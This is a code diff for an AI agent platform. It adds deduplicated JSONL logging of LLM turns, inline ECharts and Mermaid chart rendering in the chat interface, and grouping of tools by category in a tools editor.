prior turn records. Content-addressed (not positional) because the agent
prunes messages mid-session, so a tail-delta would be wrong.
Errors are silently swallowed; this must never break the agent.
"""
import hashlib
import json
import logging
import os
@@ -28,6 +39,12 @@ def _llm_debug_dir() -> Path:
_log_file: IO[str] | None = None
_log_ready = False # lazy init guard
# Per-execution_id delta state. Reset implicitly on process restart — a fresh
# log file has no prior context, so re-emitting the header on first turn is
# correct.
_session_header_hash: dict[str, str] = {}
_session_seen_msgs: dict[str, set[str]] = {}
def _open_log() -> IO[str] | None:
"""Open the JSONL log file for this process."""
@@ -61,6 +78,17 @@ def _serialize_tools(tools: Any) -> list[dict[str, Any]]:
return out
def _content_hash(payload: Any) -> str:
raw = json.dumps(payload, default=str, sort_keys=True, ensure_ascii=False)
return hashlib.sha256(raw.encode("utf-8")).hexdigest()[:16]
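Because the hash serializes with ``sort_keys=True``, two messages that differ only in dict key order hash identically, which is what makes the dedup in ``_session_seen_msgs`` safe across re-sent history. A quick standalone illustration of that property (same construction as ``_content_hash`` above):

```python
import hashlib
import json


def content_hash(payload):
    # Canonical JSON (sorted keys), SHA-256, truncated to 16 hex chars.
    raw = json.dumps(payload, default=str, sort_keys=True, ensure_ascii=False)
    return hashlib.sha256(raw.encode("utf-8")).hexdigest()[:16]


a = content_hash({"role": "user", "content": "hi"})
b = content_hash({"content": "hi", "role": "user"})  # same message, keys reordered
c = content_hash({"role": "user", "content": "hi!"})  # different content
```

Key order is normalized away; any change to the values produces a different hash.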
def _write_line(record: dict[str, Any]) -> None:
assert _log_file is not None
_log_file.write(json.dumps(record, default=str) + "\n")
_log_file.flush()
def log_llm_turn(
*,
node_id: str,
@@ -75,7 +103,7 @@ def log_llm_turn(
token_counts: dict[str, Any],
tools: list[Any] | None = None,
) -> None:
"""Write one JSONL line capturing a complete LLM turn.
"""Write JSONL records capturing one LLM turn (header + turn delta).
Never raises.
"""
@@ -89,23 +117,57 @@ def log_llm_turn(
_log_ready = True
if _log_file is None:
return
record = {
# UTC + offset matches tool_call start_timestamp (agent_loop.py)
# so the viewer can render every event in one consistent local zone.
"timestamp": datetime.now(UTC).isoformat(),
"node_id": node_id,
"stream_id": stream_id,
"execution_id": execution_id,
"iteration": iteration,
"system_prompt": system_prompt,
"tools": _serialize_tools(tools),
"messages": messages,
"assistant_text": assistant_text,
"tool_calls": tool_calls,
"tool_results": tool_results,
"token_counts": token_counts,
}
_log_file.write(json.dumps(record, default=str) + "\n")
_log_file.flush()
# UTC + offset matches tool_call start_timestamp (agent_loop.py)
# so the viewer can render every event in one consistent local zone.
timestamp = datetime.now(UTC).isoformat()
serialized_tools = _serialize_tools(tools)
# Re-emit the header on first turn or whenever system/tools change.
# The Queen reflects different prompts across turns, so we can't
# assume strict immutability per execution_id.
header_hash = _content_hash({"system_prompt": system_prompt, "tools": serialized_tools})
if _session_header_hash.get(execution_id) != header_hash:
_write_line(
{
"_kind": "session_header",
"timestamp": timestamp,
"execution_id": execution_id,
"node_id": node_id,
"stream_id": stream_id,
"header_hash": header_hash,
"system_prompt": system_prompt,
"tools": serialized_tools,
}
)
_session_header_hash[execution_id] = header_hash
seen = _session_seen_msgs.setdefault(execution_id, set())
message_hashes: list[str] = []
new_messages: dict[str, dict[str, Any]] = {}
for msg in messages or []:
h = _content_hash(msg)
message_hashes.append(h)
if h not in seen:
seen.add(h)
new_messages[h] = msg
_write_line(
{
"_kind": "turn",
"timestamp": timestamp,
"execution_id": execution_id,
"node_id": node_id,
"stream_id": stream_id,
"iteration": iteration,
"header_hash": header_hash,
"message_hashes": message_hashes,
"new_messages": new_messages,
"assistant_text": assistant_text,
"tool_calls": tool_calls,
"tool_results": tool_results,
"token_counts": token_counts,
}
)
except Exception:
pass # never break the agent
+1264 -2
File diff suppressed because it is too large
+2
@@ -11,7 +11,9 @@
},
"dependencies": {
"clsx": "^2.1.1",
"echarts": "^5.6.0",
"lucide-react": "^0.575.0",
"mermaid": "^11.14.0",
"react": "^18.3.1",
"react-dom": "^18.3.1",
"react-markdown": "^10.1.0",
+61 -45
@@ -13,6 +13,9 @@ import {
} from "lucide-react";
import WorkerRunBubble from "@/components/WorkerRunBubble";
import type { WorkerRunGroup } from "@/components/WorkerRunBubble";
import ChartToolDetail, {
type ChartToolEntry,
} from "@/components/charts/ChartToolDetail";
export interface ImageContent {
type: "image_url";
@@ -205,7 +208,7 @@ export function toolHex(name: string): string {
}
export function ToolActivityRow({ content }: { content: string }) {
let tools: { name: string; done: boolean }[] = [];
let tools: ChartToolEntry[] = [];
try {
const parsed = JSON.parse(content);
tools = parsed.tools || [];
@@ -239,52 +242,65 @@ export function ToolActivityRow({ content }: { content: string }) {
if (counts.done > 0) donePills.push({ name, count: counts.done });
}
// Per-call chart embeds: chart_render's result envelope carries the
// spec back, so the chat renders the same chart the server
// rasterized to PNG. Other tools stay pill-only by design.
const chartDetails = tools.filter((t) => t.name.startsWith("chart_"));
return (
<div className="flex gap-3 pl-10">
<div className="flex flex-wrap items-center gap-1.5">
{runningPills.map((p) => {
const hex = toolHex(p.name);
return (
<span
key={`run-${p.name}`}
className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
style={{
color: hex,
backgroundColor: `${hex}18`,
border: `1px solid ${hex}35`,
}}
>
<Loader2 className="w-2.5 h-2.5 animate-spin" />
{p.name}
{p.count > 1 && (
<span className="text-[10px] font-medium opacity-70">
×{p.count}
</span>
)}
</span>
);
})}
{donePills.map((p) => {
const hex = toolHex(p.name);
return (
<span
key={`done-${p.name}`}
className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
style={{
color: hex,
backgroundColor: `${hex}18`,
border: `1px solid ${hex}35`,
}}
>
<Check className="w-2.5 h-2.5" />
{p.name}
{p.count > 1 && (
<span className="text-[10px] opacity-80">×{p.count}</span>
)}
</span>
);
})}
<div className="flex flex-col gap-0.5">
<div className="flex gap-3 pl-10">
<div className="flex flex-wrap items-center gap-1.5">
{runningPills.map((p) => {
const hex = toolHex(p.name);
return (
<span
key={`run-${p.name}`}
className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
style={{
color: hex,
backgroundColor: `${hex}18`,
border: `1px solid ${hex}35`,
}}
>
<Loader2 className="w-2.5 h-2.5 animate-spin" />
{p.name}
{p.count > 1 && (
<span className="text-[10px] font-medium opacity-70">
×{p.count}
</span>
)}
</span>
);
})}
{donePills.map((p) => {
const hex = toolHex(p.name);
return (
<span
key={`done-${p.name}`}
className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
style={{
color: hex,
backgroundColor: `${hex}18`,
border: `1px solid ${hex}35`,
}}
>
<Check className="w-2.5 h-2.5" />
{p.name}
{p.count > 1 && (
<span className="text-[10px] opacity-80">×{p.count}</span>
)}
</span>
);
})}
</div>
</div>
{chartDetails.map((t, idx) => (
<ChartToolDetail
key={t.callKey ?? `${t.name}-${idx}`}
entry={t}
/>
))}
</div>
);
}
+92 -12
@@ -8,7 +8,7 @@ import {
Wrench,
AlertCircle,
} from "lucide-react";
import type { ToolMeta, McpServerTools } from "@/api/queens";
import type { ToolMeta, McpServerTools, ToolCategory } from "@/api/queens";
/** Shape every Tools section (Queen / Colony) shares. */
export interface ToolsSnapshot {
@@ -17,11 +17,86 @@ export interface ToolsSnapshot {
lifecycle: ToolMeta[];
synthetic: ToolMeta[];
mcp_servers: McpServerTools[];
/** Optional: curated category groupings (queens only today). When
* present, tools that belong to a category are grouped under that
* category instead of their MCP server. */
categories?: ToolCategory[];
/** Optional: when true, the allowlist came from the role-based
* default (no explicit save). Only queens surface this today. */
is_role_default?: boolean;
}
type ToolWithEnabled = ToolMeta & { enabled: boolean };
interface RenderGroup {
/** Stable key for expansion state and React keys. */
key: string;
/** Display title shown in the collapsible header. */
title: string;
tools: ToolWithEnabled[];
}
/** Snake_case / kebab-case → Title Case for category labels so they
* read naturally next to MCP server names. */
function formatCategoryTitle(name: string): string {
return name
.split(/[_-]+/)
.filter((w) => w.length > 0)
.map((w) => w.charAt(0).toUpperCase() + w.slice(1))
.join(" ");
}
/** Build display groups with the priority: category → MCP server → "Other tools".
* A tool that belongs to multiple categories lands in the first one (input order). */
function buildGroups(
mcpServers: McpServerTools[],
categories: ToolCategory[] | undefined,
): RenderGroup[] {
const toolCategory = new Map<string, string>();
categories?.forEach((cat) => {
cat.tools.forEach((toolName) => {
if (!toolCategory.has(toolName)) toolCategory.set(toolName, cat.name);
});
});
const groupMap = new Map<string, RenderGroup>();
// Pre-seed category groups in their original order so categories
// come before MCP servers regardless of which tool we encounter first.
categories?.forEach((cat) => {
groupMap.set(`cat:${cat.name}`, {
key: `cat:${cat.name}`,
title: formatCategoryTitle(cat.name),
tools: [],
});
});
mcpServers.forEach((srv) => {
srv.tools.forEach((t) => {
const cat = toolCategory.get(t.name);
let key: string;
let title: string;
if (cat) {
key = `cat:${cat}`;
title = formatCategoryTitle(cat);
} else if (srv.name && srv.name !== "(unknown)") {
key = `srv:${srv.name}`;
title = formatCategoryTitle(srv.name);
} else {
key = "other";
title = "Other tools";
}
let group = groupMap.get(key);
if (!group) {
group = { key, title, tools: [] };
groupMap.set(key, group);
}
group.tools.push(t);
});
});
return Array.from(groupMap.values()).filter((g) => g.tools.length > 0);
}
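The priority in `buildGroups` (category wins over MCP server, which wins over the catch-all "Other tools") reduces to a key-selection decision per tool. A language-neutral sketch of just that decision, written in Python for brevity (function name and sample inputs are hypothetical, not from the diff):

```python
def group_key(tool_name, server_name, tool_category):
    """Mirror the grouping priority: category -> MCP server -> other."""
    cat = tool_category.get(tool_name)
    if cat:
        return f"cat:{cat}"
    if server_name and server_name != "(unknown)":
        return f"srv:{server_name}"
    return "other"


# A tool listed in a category is grouped there even though it also
# belongs to an MCP server; uncategorized tools fall back to the server.
tool_category = {"chart_render": "visualization"}
```

The `cat:`/`srv:` prefixes keep the two namespaces from colliding, matching the `key` strings the TSX code uses for expansion state.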
export interface ToolsEditorProps {
/** Stable identifier — refetches when it changes. */
subjectKey: string;
@@ -219,6 +294,11 @@ export default function ToolsEditor({
return s;
}, [data]);
const groups = useMemo(
() => (data ? buildGroups(data.mcp_servers, data.categories) : []),
[data],
);
const dirty = useMemo(() => {
const a = draftAllowed;
const b = baselineRef.current;
@@ -401,10 +481,10 @@ export default function ToolsEditor({
</CollapsibleGroup>
)}
{data.mcp_servers.map((srv) => {
const toolNames = srv.tools.map((t) => t.name);
{groups.map((group) => {
const toolNames = group.tools.map((t) => t.name);
const state = triStateForServer(toolNames, draftAllowed);
const enabledInServer =
const enabledInGroup =
draftAllowed === null
? toolNames.length
: toolNames.reduce(
@@ -413,13 +493,13 @@ export default function ToolsEditor({
);
return (
<CollapsibleGroup
key={srv.name}
title={srv.name === "(unknown)" ? "MCP Tools" : srv.name}
count={srv.tools.length}
badge={`${enabledInServer}/${srv.tools.length}`}
expanded={!!expanded[srv.name]}
key={group.key}
title={group.title}
count={group.tools.length}
badge={`${enabledInGroup}/${group.tools.length}`}
expanded={!!expanded[group.key]}
onToggle={() =>
setExpanded((p) => ({ ...p, [srv.name]: !p[srv.name] }))
setExpanded((p) => ({ ...p, [group.key]: !p[group.key] }))
}
leading={
<TriStateCheckbox
@@ -429,12 +509,12 @@ export default function ToolsEditor({
}
>
<div className="flex flex-col">
{srv.tools.map((t) => {
{group.tools.map((t) => {
const enabled =
draftAllowed === null ? true : draftAllowed.has(t.name);
return (
<ToolRow
key={`${srv.name}-${t.name}`}
key={`${group.key}-${t.name}`}
name={t.name}
description={t.description}
enabled={enabled}
@@ -0,0 +1,158 @@
/**
* Per-call detail row for ``chart_*`` tool calls.
*
* The canonical embedding mechanism: when the agent invokes
* ``chart_render``, the runtime stores the result envelope in
* ``events.jsonl``; ``chat-helpers.replayEvent`` retains it and the
* chat panel dispatches it here. We read ``result.spec`` and mount
* the live renderer; ``result.file_url`` becomes the download link.
*
* Rules baked in:
* - The chart is reconstructed FROM THE TOOL RESULT, not from any
* markdown fence the agent might have written. Calling the tool
* IS the embedding — there's nothing else to remember.
* - The chart survives session reload because the spec lives in
* events.jsonl alongside the tool_call_completed event.
* - The downloadable PNG lives at ``result.file_url`` (a ``file://``
* URI on the runtime host). The web frontend can't open file://
* directly; we surface ``file_path`` as text and give a Copy
* button so the user can paste it into a file manager. (The
* desktop renderer has an Electron IPC bridge — not available
* in OSS.)
*/
import { lazy, Suspense, useState } from "react";
import { Copy, Loader2, Check } from "lucide-react";
// Lazy chunks so non-chart messages don't drag in echarts/mermaid.
const EChartsBlock = lazy(() => import("./EChartsBlock"));
const MermaidBlock = lazy(() => import("./MermaidBlock"));
export interface ChartToolEntry {
name: string;
done: boolean;
args?: unknown;
result?: unknown;
isError?: boolean;
callKey?: string;
}
interface ChartResult {
kind?: "echarts" | "mermaid";
spec?: unknown;
file_path?: string;
file_url?: string;
title?: string;
error?: string;
// Width/height come back from the server tool but are NOT displayed
// in the footer. Kept here so the live in-chat render can match the
// spec's native aspect ratio instead of forcing a 16:9 box that
// clips wide dashboards.
width?: number;
height?: number;
}
function asResult(v: unknown): ChartResult {
if (v && typeof v === "object") return v as ChartResult;
return {};
}
export default function ChartToolDetail({ entry }: { entry: ChartToolEntry }) {
const [copyState, setCopyState] = useState<"idle" | "copied">("idle");
// Still running: show a tiny inline spinner. Charts render fast (a
// few hundred ms), so a full skeleton would flash and feel janky.
if (!entry.done) {
return (
<div className="pl-10 mt-1.5">
<div className="flex items-center gap-2 text-[11px] text-muted-foreground">
<Loader2 className="w-3 h-3 animate-spin shrink-0" />
<span>rendering chart</span>
</div>
</div>
);
}
const result = asResult(entry.result);
if (result.error) {
// Errors are intentionally NOT shown to the user — the agent sees
// them in the tool result envelope and is expected to retry with a
// fixed spec.
return null;
}
const kind = result.kind;
const spec = result.spec;
if (!kind || spec === undefined) {
return null;
}
const handleCopyPath = async () => {
if (!result.file_path) return;
try {
await navigator.clipboard.writeText(result.file_path);
setCopyState("copied");
window.setTimeout(() => setCopyState("idle"), 2000);
} catch {
// Clipboard API unavailable (insecure context); silently no-op.
}
};
// Honor the spec's native aspect ratio when both dimensions are
// known (the server tool always returns them).
const aspectRatio =
result.width && result.height ? result.width / result.height : undefined;
return (
<div className="pl-10 mt-1.5 max-w-5xl">
<Suspense
fallback={
<div className="flex items-center gap-2 text-[11px] text-muted-foreground">
<Loader2 className="w-3 h-3 animate-spin" />
<span>loading chart engine</span>
</div>
}
>
{kind === "echarts" ? (
<EChartsBlock spec={spec} aspectRatio={aspectRatio} />
) : kind === "mermaid" ? (
<MermaidBlock source={typeof spec === "string" ? spec : ""} />
) : (
<div className="text-[11px] text-muted-foreground">
unknown chart kind: {String(kind)}
</div>
)}
</Suspense>
{/* Footer: title + path-copy. The PNG lives on the runtime host;
web browsers can't open file:// URIs from a hosted page, so
we surface the path as a copyable string instead of a fake
Download button. */}
<div className="flex items-center justify-between mt-2 px-1 text-[10.5px] text-muted-foreground/80">
<span className="truncate min-w-0 flex-1">
{result.title || kind}
</span>
{result.file_path && (
<button
type="button"
onClick={handleCopyPath}
className="inline-flex items-center gap-1 hover:text-foreground transition shrink-0 cursor-pointer"
title={
copyState === "copied"
? "Copied to clipboard"
: `Copy path: ${result.file_path}`
}
>
{copyState === "copied" ? (
<Check className="w-3 h-3 text-primary" />
) : (
<Copy className="w-3 h-3" />
)}
{copyState === "copied" ? "Copied" : "Copy path"}
</button>
)}
</div>
</div>
);
}
@@ -0,0 +1,232 @@
/**
* Live ECharts renderer for the chat bubble.
*
* Mounts an ECharts instance into a sized div and feeds it the spec
* the agent passed to `chart_render`. The same spec is rendered
* server-side to a PNG; the live render is the in-chat experience,
* the PNG is the downloadable.
*
* - Lazy-loaded via dynamic import so non-chart messages don't pay
* the ~1 MB bundle cost.
* - SVG renderer (`{ renderer: 'svg' }`) for crisp scaling and lower
* memory than canvas. Looks identical at chat-bubble sizes.
* - Resize handled via ResizeObserver; charts adapt to the bubble's
* width while keeping a fixed aspect ratio.
* - Error boundary inside the component itself: invalid specs render
* a tiny "spec invalid" pill with a copy-spec button so the agent
* can self-correct on the next turn.
*/
import { useEffect, useRef, useState } from "react";
import { AlertCircle } from "lucide-react";
import { buildOpenHiveTheme } from "./openhiveTheme";
interface Props {
spec: unknown;
/** Aspect ratio kept while the width adapts to the bubble. Defaults
* to 16:9 — the standard chart shape that fits in slide decks. */
aspectRatio?: number;
/** Hard cap on rendered height (px). Prevents very-tall charts from
* dominating the chat scroll. */
maxHeight?: number;
}
const _themeRegistered: Record<"light" | "dark", boolean> = {
light: false,
dark: false,
};
/**
* Detect the user's current UI theme from the DOM. The OpenHive
* desktop app applies a `dark` class to <html> in dark mode (see
* index.css). We use the same signal here so the live chart matches
* the surrounding chat — neither the agent nor the caller picks the
* theme, and the PNG download is rendered server-side from the same
* source of truth (HIVE_DESKTOP_THEME env, set by Electron from
* nativeTheme.shouldUseDarkColors).
*/
function useDocumentTheme(): "light" | "dark" {
const [theme, setTheme] = useState<"light" | "dark">(() =>
document.documentElement.classList.contains("dark") ? "dark" : "light",
);
useEffect(() => {
const obs = new MutationObserver(() => {
setTheme(
document.documentElement.classList.contains("dark") ? "dark" : "light",
);
});
obs.observe(document.documentElement, {
attributes: true,
attributeFilter: ["class"],
});
return () => obs.disconnect();
}, []);
return theme;
}
export default function EChartsBlock({
spec,
aspectRatio = 16 / 9,
maxHeight = 480,
}: Props) {
const containerRef = useRef<HTMLDivElement>(null);
const chartRef = useRef<unknown>(null); // echarts.ECharts instance, kept untyped to avoid coupling the type import
const [error, setError] = useState<string | null>(null);
// Theme follows the user's OpenHive UI mode automatically. Same
// signal feeds the server-side PNG render via HIVE_DESKTOP_THEME, so
// live chart and downloaded file always match.
const theme = useDocumentTheme();
useEffect(() => {
if (!containerRef.current) return;
let disposed = false;
let resizeObserver: ResizeObserver | null = null;
(async () => {
try {
const echarts = await import("echarts");
if (disposed || !containerRef.current) return;
// Register the OpenHive brand theme once per (theme, mode) so
// bar/line/etc. inherit our palette + cozy spacing instead of
// ECharts' generic-web-2010 defaults. Theme matches the
// server-side render via tools/src/chart_tools/theme.py.
const themeName = theme === "dark" ? "openhive-dark" : "openhive-light";
if (!_themeRegistered[theme]) {
echarts.registerTheme(themeName, buildOpenHiveTheme(theme));
_themeRegistered[theme] = true;
}
// Coerce string specs to objects (defensive — the agent should
// pass dicts but LLMs sometimes serialize before sending).
let parsedSpec: Record<string, unknown>;
if (typeof spec === "string") {
try {
parsedSpec = JSON.parse(spec);
} catch {
throw new Error("spec is a string and not valid JSON");
}
} else {
parsedSpec = spec as Record<string, unknown>;
}
// Disjoint-region layout policy. ECharts has no auto-layout
// for component overlap (verified against the option ref):
// title/legend/grid are absolutely positioned and ignore each
// other. We enforce three non-overlapping regions:
// - Title: anchored to TOP (top:16, no bottom)
// - Legend: anchored to BOTTOM (bottom:16, no top) except
// when orient:'vertical' (side legend stays where placed)
// - Grid: middle, with containLabel for axis labels
// Strips user-supplied vertical positions so an agent spec
// like `legend.top:"8%"` (which lands inside the title at
// chat-bubble dimensions — the 2026-05-01 bug) can't collide.
// Horizontal anchoring is preserved so left-aligned legends
// still work. Must mirror chart_tools/renderer.py exactly so
// the live chart and downloaded PNG look the same.
const userTitle = (parsedSpec.title as Record<string, unknown> | undefined) ?? {};
const userLegend = parsedSpec.legend as Record<string, unknown> | undefined;
const userGrid = (parsedSpec.grid as Record<string, unknown> | undefined) ?? {};
const legendVertical = userLegend?.orient === "vertical";
const stripV = (o: Record<string, unknown>) => {
const c = { ...o };
delete c.top;
delete c.bottom;
return c;
};
const normalizedSpec: Record<string, unknown> = {
...parsedSpec,
title: { left: "center", ...stripV(userTitle), top: 16 },
grid: {
left: 56,
right: 56,
...stripV(userGrid),
// Force vertical bounds — user-supplied grid.top/bottom
// (often percentage strings like "8%" the agent picks at
// default dims) don't generalize across chat-bubble sizes.
// 96 covers: bottom legend (~36) + xAxis name (containLabel
// handles tick labels but NOT axis name; outerBoundsMode is
// v6+ and we're on v5). 40 when no legend.
top: 64,
bottom: userLegend && !legendVertical ? 96 : 40,
containLabel: true,
},
};
if (userLegend) {
const legendDefaults = {
icon: "roundRect",
itemWidth: 12,
itemHeight: 12,
itemGap: 16,
};
normalizedSpec.legend = legendVertical
? { ...legendDefaults, ...userLegend }
: { ...legendDefaults, ...stripV(userLegend), bottom: 16 };
}
// Fresh chart instance per spec; cheaper than reuse + setOption
// for our sizes and avoids stale state between specs.
const chart = echarts.init(containerRef.current, themeName, {
renderer: "svg",
});
chartRef.current = chart;
chart.setOption(normalizedSpec, {
notMerge: true,
lazyUpdate: false,
});
// Resize on container size change.
resizeObserver = new ResizeObserver(() => {
if (chartRef.current && containerRef.current) {
(chartRef.current as { resize: () => void }).resize();
}
});
resizeObserver.observe(containerRef.current);
} catch (e) {
if (!disposed) {
setError(e instanceof Error ? e.message : String(e));
}
}
})();
return () => {
disposed = true;
if (resizeObserver) resizeObserver.disconnect();
if (chartRef.current) {
try {
(chartRef.current as { dispose: () => void }).dispose();
} catch {
// best-effort cleanup
}
chartRef.current = null;
}
};
}, [spec, theme]);
if (error) {
return (
<div
className="flex items-center gap-2 text-[11px] text-muted-foreground px-2.5 py-1.5 rounded-md border border-border/40 bg-muted/30"
role="alert"
>
<AlertCircle className="w-3 h-3 shrink-0" />
<span>chart spec invalid: {error}</span>
</div>
);
}
return (
<div
ref={containerRef}
// Transparent background so the chart blends with the chat bubble
// instead of sitting in an obtrusive white card. The OpenHive
// ECharts theme also sets backgroundColor: 'transparent' so the
// chart itself is see-through. Subtle rounded corners only.
className="w-full rounded-lg bg-transparent"
style={{
// Reserve aspect-ratio space so the chart doesn't pop in.
// ECharts will overwrite the inline style as it lays out.
aspectRatio,
maxHeight,
}}
/>
);
}
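The disjoint-region normalization in `EChartsBlock` leans on spread-merge ordering: `stripV` removes user vertical anchors, then the forced `top`/`bottom` literals come after the spread, so they always win. A Python dict-merge sketch of the same merge semantics (helper names hypothetical; values copied from the diff):

```python
def strip_vertical(o):
    """Drop user-supplied vertical anchors, mirroring stripV above."""
    return {k: v for k, v in o.items() if k not in ("top", "bottom")}


def normalize_title(user_title):
    # Later keys win, as with JS object spread: the forced top=16 is
    # applied last, so a user-supplied title.top can never survive.
    return {"left": "center", **strip_vertical(user_title), "top": 16}


def normalize_legend(user_legend):
    defaults = {"icon": "roundRect", "itemWidth": 12, "itemHeight": 12, "itemGap": 16}
    if user_legend.get("orient") == "vertical":
        # Side legends keep whatever position the spec gave them.
        return {**defaults, **user_legend}
    return {**defaults, **strip_vertical(user_legend), "bottom": 16}
```

This is why a spec like `legend.top: "8%"` can no longer collide with the title: the vertical anchor is stripped before the forced bottom anchor is merged in.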
@@ -0,0 +1,81 @@
/**
* Live Mermaid renderer for the chat bubble.
*
* Renders a mermaid source string to an inline SVG. Mermaid is
* lazy-loaded so non-diagram messages don't pay the ~600 KB cost.
*
* Theme follows the OpenHive light/dark setting. Errors render a
* tiny pill so the agent gets feedback for the next turn.
*/
import { useEffect, useRef, useState } from "react";
import { AlertCircle } from "lucide-react";
interface Props {
source: string;
theme?: "light" | "dark";
}
let _mermaidInitialized = false;
export default function MermaidBlock({ source, theme = "light" }: Props) {
const ref = useRef<HTMLDivElement>(null);
const [error, setError] = useState<string | null>(null);
useEffect(() => {
let disposed = false;
(async () => {
try {
const mermaid = (await import("mermaid")).default;
if (!_mermaidInitialized) {
mermaid.initialize({
startOnLoad: false,
theme: theme === "dark" ? "dark" : "default",
securityLevel: "loose",
fontFamily:
"'Inter Tight', -apple-system, BlinkMacSystemFont, system-ui, sans-serif",
});
_mermaidInitialized = true;
}
if (disposed || !ref.current) return;
// Unique id per render to avoid conflicting injected styles.
const id = `mmd-${Math.random().toString(36).slice(2, 10)}`;
const { svg } = await mermaid.render(id, source);
if (disposed || !ref.current) return;
ref.current.innerHTML = svg;
} catch (e) {
if (!disposed) {
setError(e instanceof Error ? e.message : String(e));
}
}
})();
return () => {
disposed = true;
};
}, [source, theme]);
if (error) {
return (
<div
className="flex items-center gap-2 text-[11px] text-muted-foreground px-2.5 py-1.5 rounded-md border border-border/40 bg-muted/30"
role="alert"
>
<AlertCircle className="w-3 h-3 shrink-0" />
<span>diagram syntax invalid: {error}</span>
</div>
);
}
return (
<div
ref={ref}
// Match EChartsBlock: transparent so the diagram blends with the
// chat bubble; rounded corners and inner padding give breathing
// room without adding a visible card.
className="w-full overflow-x-auto rounded-lg bg-transparent p-4 [&_svg]:max-w-full [&_svg]:h-auto [&_svg]:mx-auto"
/>
);
}
@@ -0,0 +1,131 @@
/**
* OpenHive ECharts theme — must stay in sync with
* tools/src/chart_tools/theme.py on the runtime side.
*
* Same palette + spacing both for the live in-chat ECharts mount
* (see EChartsBlock.tsx) and the headless server-side render that
* produces the downloadable PNG. Without this both diverge: the chat
* shows ECharts default colors and the PNG shows OpenHive colors,
* confusing the user.
*/
const PALETTE_LIGHT = [
"#db6f02", // honey orange (primary)
"#456a8d", // slate blue
"#3d7a4a", // sage green
"#a8453d", // terracotta brick
"#c48820", // warm bronze
"#5d5b88", // indigo
"#7d6b51", // olive
"#8e4200", // rust
];
const PALETTE_DARK = [
"#ffb825",
"#7ba2c4",
"#7bb285",
"#d97470",
"#e0a83a",
"#9892c4",
"#b8a685",
"#d97e3a",
];
export function buildOpenHiveTheme(theme: "light" | "dark" = "light") {
const isDark = theme === "dark";
const fg = isDark ? "#e8e6e0" : "#1a1a1a";
const fgMuted = isDark ? "#8a8a8a" : "#6b6b6b";
const gridLine = isDark ? "#2a2724" : "#ebe9e2";
const axisLine = isDark ? "#3a3733" : "#d0cfca";
const tooltipBg = isDark ? "#181715" : "#ffffff";
const tooltipBorder = isDark ? "#2a2724" : "#d0cfca";
const palette = isDark ? PALETTE_DARK : PALETTE_LIGHT;
return {
color: palette,
backgroundColor: "transparent",
textStyle: {
fontFamily:
'"Inter Tight", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif',
color: fg,
fontSize: 12,
},
title: {
left: "center",
top: 28,
textStyle: { color: fg, fontSize: 16, fontWeight: 600 },
subtextStyle: { color: fgMuted, fontSize: 12 },
},
legend: {
top: 64,
icon: "roundRect",
itemWidth: 12,
itemHeight: 12,
itemGap: 20,
textStyle: { color: fgMuted, fontSize: 12 },
},
grid: {
top: 116,
left: 48,
right: 48,
bottom: 72,
containLabel: true,
},
categoryAxis: {
axisLine: { show: true, lineStyle: { color: axisLine } },
axisTick: { show: false },
axisLabel: { color: fgMuted, fontSize: 11, margin: 14 },
splitLine: { show: false },
nameLocation: "middle",
nameGap: 36,
nameTextStyle: { color: fgMuted, fontSize: 12 },
},
valueAxis: {
axisLine: { show: false },
axisTick: { show: false },
axisLabel: { color: fgMuted, fontSize: 11, margin: 14 },
splitLine: { lineStyle: { color: gridLine, type: "dashed" } },
nameLocation: "middle",
nameGap: 42,
nameTextStyle: { color: fgMuted, fontSize: 12, fontWeight: 500 },
// Don't auto-rotate value-axis names — the theme can't tell xAxis
// (horizontal bar) from yAxis (vertical bar), so rotating both at
// 90° vertical-mounts the xAxis name on horizontal-bar charts and
// it collides with the legend (peer_val regression). Let specs
// set nameRotate explicitly when they want a vertical y-name.
},
timeAxis: {
axisLine: { show: true, lineStyle: { color: axisLine } },
axisLabel: { color: fgMuted, fontSize: 11, margin: 14 },
splitLine: { show: false },
nameLocation: "middle",
nameGap: 36,
nameTextStyle: { color: fgMuted, fontSize: 12 },
},
tooltip: {
backgroundColor: tooltipBg,
borderColor: tooltipBorder,
borderWidth: 1,
padding: [8, 12],
textStyle: { color: fg, fontSize: 12 },
axisPointer: {
lineStyle: { color: axisLine, type: "dashed" },
crossStyle: { color: axisLine },
},
},
bar: { itemStyle: { borderRadius: [3, 3, 0, 0] } },
line: {
lineStyle: { width: 2.5 },
symbol: "circle",
symbolSize: 6,
},
candlestick: {
itemStyle: {
color: "#3d7a4a",
color0: "#a8453d",
borderColor: "#3d7a4a",
borderColor0: "#a8453d",
},
},
};
}
+83 -8
@@ -295,12 +295,40 @@ export function sseEventToChatMessage(
* deferred `tool_call_completed` events can find the exact pill they belong
* to after the turn counter moves on.
*/
/**
* For chart_* tools we retain the args (from tool_call_started) and
* result envelope (from tool_call_completed) so the chat panel can
* render the live chart inline from the same spec the runtime
* rasterized to PNG. Other tools omit these fields to keep the
* tool_status content payload small (catalogs are pill-only).
*/
type ToolEntry = {
name: string;
done: boolean;
/** opaque per-call id surfaced to the UI; used to key React rows */
callKey?: string;
/** present only for tools whose name matches shouldRetainDetail */
args?: unknown;
result?: unknown;
isError?: boolean;
};
type ToolRowState = {
streamId: string;
executionId: string;
tools: Record<string, { name: string; done: boolean }>;
tools: Record<string, ToolEntry>;
};
/**
* Names whose detail (args + result envelope) we surface in the chat.
* Other tools stay pill-only — keeping their args/results out of the
* message content avoids ballooning the chat history with tool
* catalogs, file blobs, etc.
*/
function shouldRetainDetail(toolName: string): boolean {
return toolName.startsWith("chart_");
}
export interface ReplayState {
turnCounters: Record<string, number>;
toolRows: Record<string, ToolRowState>;
@@ -349,10 +377,20 @@ function toolLookupKey(
}
function toolRowContent(row: ToolRowState): string {
const tools = Object.values(row.tools).map((t) => ({
name: t.name,
done: t.done,
}));
const tools = Object.values(row.tools).map((t) => {
const out: ToolEntry = { name: t.name, done: t.done };
// Carry callKey + retained fields only for tools whose detail the
// UI mounts (chart_*). Pill-only tools stay terse so the
// tool_status payload doesn't grow with every catalog/file_ops
// call and existing snapshot tests stay valid.
if (shouldRetainDetail(t.name)) {
if (t.callKey !== undefined) out.callKey = t.callKey;
if (t.args !== undefined) out.args = t.args;
if (t.result !== undefined) out.result = t.result;
if (t.isError !== undefined) out.isError = t.isError;
}
return out;
});
